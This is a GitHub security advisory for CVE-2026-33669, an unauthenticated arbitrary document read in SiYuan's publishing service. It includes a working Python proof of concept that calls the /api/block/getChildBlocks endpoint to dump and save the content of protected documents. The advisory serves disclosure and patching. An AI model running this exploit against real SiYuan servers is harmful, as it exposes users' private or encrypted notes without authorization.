Skip to content

SiYuan has Arbitrary Document Reading within the Publishing Service

Critical severity GitHub Reviewed Published Mar 23, 2026 in siyuan-note/siyuan • Updated Mar 27, 2026

Package

gomod github.com/siyuan-note/siyuan/kernel (Go)

Affected versions

<= 0.0.0-20260317012524-fe4523fff2c8
> 0

Patched versions

None

Description

Details

Document IDs were retrieved via the /api/file/readDir interface, and then the /api/block/getChildBlocks interface was used to view the content of all documents.

PoC

#!/usr/bin/env python3
"""SiYuan /api/block/getChildBlocks 文档内容读取"""
import requests
import json
import sys

def get_child_blocks(target_url, doc_id):
    """
    调用 SiYuan 的 /api/block/getChildBlocks API 获取文档内容
    """
    url = f"{target_url.rstrip('/')}/api/block/getChildBlocks"
    
    headers = {
        "Content-Type": "application/json"
    }
    
    data = {
        "id": doc_id
    }
    
    try:
        response = requests.post(url, json=data, headers=headers, timeout=10)
        response.raise_for_status()
        
        result = response.json()
        
        if result.get("code") != 0:
            print(f"[-] 请求失败: {result.get('msg', '未知错误')}")
            return None
        
        return result.get("data")
        
    except requests.exceptions.RequestException as e:
        print(f"[-] 网络请求失败: {e}")
        return None
    except json.JSONDecodeError as e:
        print(f"[-] JSON解析失败: {e}")
        return None

def format_block_content(block):
    """格式化块内容"""
    content = ""
    
    # 获取块内容
    if isinstance(block, dict):
        # 尝试多种可能的字段
        md = block.get("markdown", "") or block.get("content", "") or ""
        if md:
            content = md.strip()
    
    return content

def main():
    """主函数"""
    if len(sys.argv) > 1:
        target_url = sys.argv[1]
    else:
        target_url = input("请输入 SiYuan 服务地址 (例如: http://localhost:6806): ").strip()
        if not target_url:
            target_url = "http://localhost:6806"
    
    print(f"目标地址: {target_url}")
    print("=" * 50)
    
    while True:
        print("\n" + "=" * 50)
        doc_id = input("请输入文档ID (输入 'quit' 或 'exit' 退出): ").strip()
        
        if doc_id.lower() in ['quit', 'exit', 'q']:
            print("程序退出")
            break
        
        if not doc_id:
            print("[-] 文档ID不能为空")
            continue
        
        print(f"\n[*] 正在读取文档: {doc_id}")
        
        blocks = get_child_blocks(target_url, doc_id)
        
        if blocks is None:
            print("[-] 获取文档内容失败")
            continue
        
        if not blocks:
            print(f"[!] 文档 {doc_id} 没有子块或为空")
            continue
        
        print(f"[+] 成功获取 {len(blocks)} 个子块")
        print("-" * 50)
        
        # 保存所有块内容
        all_blocks_content = []
        
        for i, block in enumerate(blocks, 1):
            content = format_block_content(block)
            if content:
                print(content[:200] + ("..." if len(content) > 200 else ""))
                
                all_blocks_content.append({
                    "index": i,
                    "content": content,
                    "raw_block": block
                })
        
        # 询问是否保存到文件
        save_choice = input("\n是否保存到文件? (y/N): ").strip().lower()
        if save_choice in ['y', 'yes']:
            filename = f"doc_{doc_id}_blocks.json"
            try:
                with open(filename, "w", encoding="utf-8") as f:
                    json.dump({
                        "doc_id": doc_id,
                        "block_count": len(blocks),
                        "blocks": all_blocks_content
                    }, f, ensure_ascii=False, indent=2)
                print(f"[+] 已保存到: {filename}")
            except Exception as e:
                print(f"[-] 保存失败: {e}")
        
        print("-" * 50)

if __name__ == "__main__":
    main()

image

Impact

File reading: All encrypted or prohibited documents under the publishing service could be read.

References

@88250 88250 published to siyuan-note/siyuan Mar 23, 2026
Published to the GitHub Advisory Database Mar 25, 2026
Reviewed Mar 25, 2026
Published by the National Vulnerability Database Mar 26, 2026
Last updated Mar 27, 2026

Severity

Critical

CVSS overall score

This score calculates overall vulnerability severity from 0 to 10 and is based on the Common Vulnerability Scoring System (CVSS).
/ 10

CVSS v3 base metrics

Attack vector
Network
Attack complexity
Low
Privileges required
None
User interaction
None
Scope
Unchanged
Confidentiality
High
Integrity
High
Availability
High

CVSS v3 base metrics

Attack vector: More severe the more the remote (logically and physically) an attacker can be in order to exploit the vulnerability.
Attack complexity: More severe for the least complex attacks.
Privileges required: More severe if no privileges are required.
User interaction: More severe when no user interaction is required.
Scope: More severe when a scope change occurs, e.g. one vulnerable component impacts resources in components beyond its security scope.
Confidentiality: More severe when loss of data confidentiality is highest, measuring the level of data access available to an unauthorized user.
Integrity: More severe when loss of data integrity is the highest, measuring the consequence of data modification possible by an unauthorized user.
Availability: More severe when the loss of impacted component availability is highest.
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

EPSS score

Exploit Prediction Scoring System (EPSS)

This score estimates the probability of this vulnerability being exploited within the next 30 days. Data provided by FIRST.
(7th percentile)

Weaknesses

Out-of-bounds Read

The product reads data past the end, or before the beginning, of the intended buffer. Learn more on MITRE.

CVE ID

CVE-2026-33669

GHSA ID

GHSA-34xj-66v3-6j83

Source code

Credits

Loading Checking history
See something to contribute? Suggest improvements for this vulnerability.